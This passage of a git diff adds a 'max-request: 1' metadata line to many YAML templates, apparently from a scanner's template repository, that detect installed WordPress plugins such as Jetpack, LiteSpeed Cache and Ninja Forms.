   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
